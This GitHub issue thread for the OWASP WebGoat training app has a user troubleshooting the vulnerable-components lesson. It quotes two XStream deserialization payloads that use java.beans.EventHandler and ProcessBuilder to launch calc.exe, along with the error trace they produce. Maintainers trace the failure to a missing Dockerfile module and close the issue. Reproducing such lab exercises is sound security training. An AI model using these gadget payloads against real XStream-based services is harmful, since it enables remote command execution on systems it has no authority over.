8000
We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
I have tried the following variations that are "supposed" to work as mentioned in:
<contact class='org.owasp.webgoat.vulnerable_components.Contact'> <handler class='java.beans.EventHandler'> <target class='java.lang.ProcessBuilder'> <command> <string>calc.exe</string> </command> </target> <action>start</action> </handler> </contact>
<contact class='dynamic-proxy'> <interface>org.owasp.webgoat.vulnerable_components.Contact</interface> <handler class='java.beans.EventHandler'> <target class='java.lang.ProcessBuilder'> <command> <string>calc.exe</string> </command> </target> <action>start</action> </handler> </contact>
Both give similar errors like so:
Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact : Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact ---- Debugging information ---- message : Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact cause-exception : com.thoughtworks.xstream.converters.reflection.ObjectAccessException cause-message : Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact class : org.owasp.webgoat.vulnerable_components.Contact required-type : org.owasp.webgoat.vulnerable_components.Contact converter-type : com.thoughtworks.xstream.converters.reflection.ReflectionConverter path : /contact line number : 1 version : 1.4.5 -------------------------------
The text was updated successfully, but these errors were encountered:
#1134: dAdd missing opening of module
0a71799
@plibither8 thanks, we missed one module in the Dockerfile
Sorry, something went wrong.
Closing as we released 2023.3
nbaars
No branches or pull requests
I have tried the following variations that are "supposed" to work as mentioned in:
Both give similar errors like so:
The text was updated successfully, but these errors were encountered: